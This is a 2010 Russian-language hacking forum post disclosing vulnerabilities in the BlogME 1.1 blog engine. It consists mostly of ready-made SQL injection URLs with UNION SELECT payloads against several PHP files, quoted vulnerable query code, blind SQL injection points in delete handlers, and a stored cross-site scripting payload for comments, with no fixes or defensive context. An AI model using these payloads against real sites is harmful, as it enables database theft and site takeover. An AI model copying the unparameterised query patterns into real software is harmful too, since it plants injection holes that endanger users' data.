07.04.2010, 15:15
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306
Репутация:
1588
|
|
BlogME
Product : BlogME 1.1
SQL injection
file : index.php
mq = off
Код:
http://x60unu/index.php?month=4&year=2007'+and+0+union+all+select+version(),version(),3,4,5,6,7,8--+
Код:
http://x60unu/index.php?cat=General'+and+0+union+all+select+1,2,3,4,5,6,7,8--+
Код:
http://x60unu/index.php?when=March%206,%202007'+and+0+union+all+select+1,2,3,4,5,6,7,8--+
SQL in Admin Panel
file : blogroll.php
PHP код:
case 'edit' :
$sqledit= "SELECT * FROM ". $prefix ."_blogroll WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result :
Код:
http://x60unu/blogroll.php?mode=edit&id=1+and+0+union+all+select+1,2,3--+
blind sql
PHP код:
$sqldelete= "DELETE FROM ". $prefix ."_blogroll where id=$id";
$resultdelete = db_query($dbname,$sqldelete);
result :
Код:
http://x60unu/blogroll.php?mode=delete&id=1[blind sql]
file : category.php
PHP код:
$sqledit= "SELECT * FROM ". $prefix ."_cat WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result:
Код:
http://x60unu/category.php?mode=edit&id=1+and+0+union+all+select+1,2--+
blind sql
PHP код:
sqldelete= "DELETE FROM ". $prefix ."_cat where id=$id";
$resultdelete = db_query($dbname,$sqldelete)
result :
Код:
http://x60unu/category.php?mode=delete&id=1[blind sql]
file : links.php
PHP код:
$sqledit= "SELECT * FROM ". $prefix ."_links WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result :
Код:
http://x60unu/links.php?mode=edit&id=1+and+0+union+all+select+1,2,3--+
blind sql
PHP код:
$sqldelete= "DELETE FROM ". $prefix ."_links where id=$id";
$resultdelete = db_query($dbname,$sqldelete);
Код:
http://x60unu/links.php?mode=delete&id=1[blind sql]
Active Xss
comments --- text comments --- "><script>alert();</script>
з.ы. двиг сплошная дыра 
|
|
|